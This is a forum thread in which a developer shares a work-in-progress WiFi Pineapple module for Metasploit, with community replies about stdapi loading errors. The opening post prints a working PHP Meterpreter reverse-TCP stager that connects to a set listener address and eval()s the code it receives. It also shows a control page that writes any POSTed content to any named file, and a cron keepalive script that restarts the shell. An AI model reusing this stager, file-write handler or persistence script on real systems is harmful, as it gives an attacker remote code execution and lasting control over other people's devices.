Darren Kitchen Posted June 15, 2012 Share Posted June 15, 2012 So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress. Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit): And here's a pic of the module WIP: It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload. Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch. Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port. Here's the php meterpreter: <?php error_reporting(0); # The payload handler overwrites this with the correct LHOST before sending # it to the victim. $ip = '172.16.42.42'; $port = 4445; $ipf = AF_INET; if (FALSE !== strpos($ip, ":")) { # ipv6 requires brackets around the address $ip = "[". $ip ."]"; $ipf = AF_INET6; } if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f($ipf, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { # We failed on the main socket. There's no way to continue, so # bail die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($B) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($B)); break; case 'socket': $b .= socket_read($s, $len-strlen($B)); break; } } # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($B); die(); ?> Just change IP and Port above to what you're using. The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code: meterpreter.php <?php if(isset($_GET['start'])) { echo "<pre>Starting Meterpreter</pre>"; exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh"); // if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") { // exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh"); // } else { // echo "<pre><b>Meterpreter already running</b></pre>"; // } } $filename = $_POST['filename']; $newdata = $_POST['newdata']; if ($newdata != "") { $newdata = ereg_replace(13, "", $newdata); $fw = fopen($filename, 'w') or die('Could not open file!'); $fb = fwrite($fw,stripslashes($newdata)) or die('Could not write to file'); fclose($fw); $fileMessage = "Updated " . $filename . "<br /><br />"; } ?> <html> <head> <title>Pineapple Control Center</title> <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"> <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" /> <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon"> </head> <body> <?php include_once("/www/pineapple/includes/navbar.php"); ?> <br><br> <center> <table width="50%"> <tr><td> <div class=news> <div class=moduleTitle><b>Configuration</b></div> <div class=moduleContent> Edit IP address and Port below to match that of your metasploit session. <?php $filename = "/www/pineapple/modules/meterpreter/tt.php"; $fh = fopen($filename, "r") or die("Could not open file!"); $data = fread($fh, filesize($filename)) or die("Could not read file!"); fclose($fh); echo "<form action='$_SERVER[php_self]' method= 'post' > <textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea> <input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'> <br><center><input type='submit' value='Update Meterpreter Script'> </form>"; ?> </div> <br> <div class=moduleTitle>Meterpreter Configuration</div> <div class=moduleContent> This keep alive script will restart the Meterpreter session if it drops connection. </div> </td></tr></table></center> </body> </html> meterpreter-keepalive.sh #!/bin/sh # ------------------------------------------------- # Simple keep alive script for meterpreter sessions # ------------------------------------------------- logger "Meterpreter: Keep-Alive Script Executed" if ! ( pidof php tt.php); then php /www/pineapple/modules/meterpreter/tt.php & logger "Meterpreter: Connection was down, restarted." else logger "Meterpreter: Connection seems to be up." fi My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up. Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then... Quote Link to comment Share on other sites More sharing options...
Anton Posted June 15, 2012 Share Posted June 15, 2012 Can't wait! nice work! Quote Link to comment Share on other sites More sharing options...
Razzlerock Posted June 15, 2012 Share Posted June 15, 2012 I saw your tweet this morning about this and it looks so very cool. Here is the youtube link from your tweet for the other guys to view; The sky is the limit with this pineapple and the dedicated team/forum. Razzlerock Quote Link to comment Share on other sites More sharing options...
sUbZeRo Posted June 15, 2012 Share Posted June 15, 2012 Looking forward to this module! :) Quote Link to comment Share on other sites More sharing options...
TheOniVeritas Posted June 15, 2012 Share Posted June 15, 2012 Very nice im new to metasploit, using armitage cant find any hosts. is there a special config for the pineapple Quote Link to comment Share on other sites More sharing options...
Crazy52 Posted June 15, 2012 Share Posted June 15, 2012 i have to say i love watching the progress on the pineapple, and this just makes it all the more epic. Quote Link to comment Share on other sites More sharing options...
zbenta Posted June 15, 2012 Share Posted June 15, 2012 (edited) Way to go Darren. Edited June 15, 2012 by zbenta Quote Link to comment Share on other sites More sharing options...
telot Posted June 15, 2012 Share Posted June 15, 2012 Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)? Kidding aside, this looks like a great addition to the pineapple - I thinking bringing more and more metasploit into the fold only bolsters the pineapples e-rep - a lot of folks in the community now a days looks on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not looking over. Thanks Darren! telot Quote Link to comment Share on other sites More sharing options...
Anton Posted June 15, 2012 Share Posted June 15, 2012 Hey guy's Armitage & Cobalt Strike, why is one expensive and for windows only and the other one is free lol? they look like they do the exact same job, not to mention they look identical, are there anyx major differences that justify spending the big bucks for Cobalt Strike? Cheer's - Anton. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted June 15, 2012 Author Share Posted June 15, 2012 Think Red Hat Enterprise vs centos. Quote Link to comment Share on other sites More sharing options...
HakenDecker Posted June 15, 2012 Share Posted June 15, 2012 (edited) That PHP is beer-worthy. Edited June 15, 2012 by HakenDecker Quote Link to comment Share on other sites More sharing options...
Anton Posted June 15, 2012 Share Posted June 15, 2012 Think Red Hat Enterprise vs centos. Ah i gotcha, cheers. Quote Link to comment Share on other sites More sharing options...
Battery_ Posted August 25, 2012 Share Posted August 25, 2012 Are there any updates? Quote Link to comment Share on other sites More sharing options...
Battery_ Posted August 26, 2012 Share Posted August 26, 2012 So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue? Quote Link to comment Share on other sites More sharing options...
Hackrylix Posted September 24, 2012 Share Posted September 24, 2012 Hi Darren, Do you have some update to tease us ? I'd like to understand better what you're trying to do. May we contribute together ? Cheers ! Quote Link to comment Share on other sites More sharing options...
blkik Posted December 2, 2012 Share Posted December 2, 2012 (edited) So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue? I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something? I did see that meterpreter comes back with a message as follows: meterpreter> load stdapi [*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh) Edited December 2, 2012 by blkik Quote Link to comment Share on other sites More sharing options...
BlackZero Posted December 5, 2012 Share Posted December 5, 2012 Very nice, I can't wait for the module! Hope to see it soon in our modules :-) Quote Link to comment Share on other sites More sharing options...
airman_dopey Posted January 6, 2013 Share Posted January 6, 2013 Also looking forward to checking this out. Hopefully it is still in the works.... Quote Link to comment Share on other sites More sharing options...
icedevil433 Posted March 11, 2013 Share Posted March 11, 2013 is there any update regarding whats been discussed above? I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?I did see that meterpreter comes back with a message as follows:meterpreter> load stdapi [*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh) Quote Link to comment Share on other sites More sharing options...
DuoM Posted June 21, 2013 Share Posted June 21, 2013 Also looking for an update on the "can't load stdapi" error. Quote Link to comment Share on other sites More sharing options...
DuoM Posted June 23, 2013 Share Posted June 23, 2013 Here's what Ive tried: In armitage, when firing up the php/meterpreter/reverse_tcp attack, under advanced options I set AutoLoadStdApi = 0, so that i could load it myself and see what happens. Running the exploit worked just fined, got my pwnd Pineapple and meterpreter shell. So I typed "load stdapi" and it says "loading stdapi extension..."... and just sits there. Nothing happens. So I crack another shell and try it again, and it says "stdapi extension already loaded." Trying ping sweep or pivoting still yields the "loading stdapi. try command later" error. I'm not to familiar with where the code is to dive in and try to figure this out, so any advice would be appreciated. Thanks! Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted June 24, 2013 Share Posted June 24, 2013 I'll take a look at this module in the future. For now the development has stopped. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.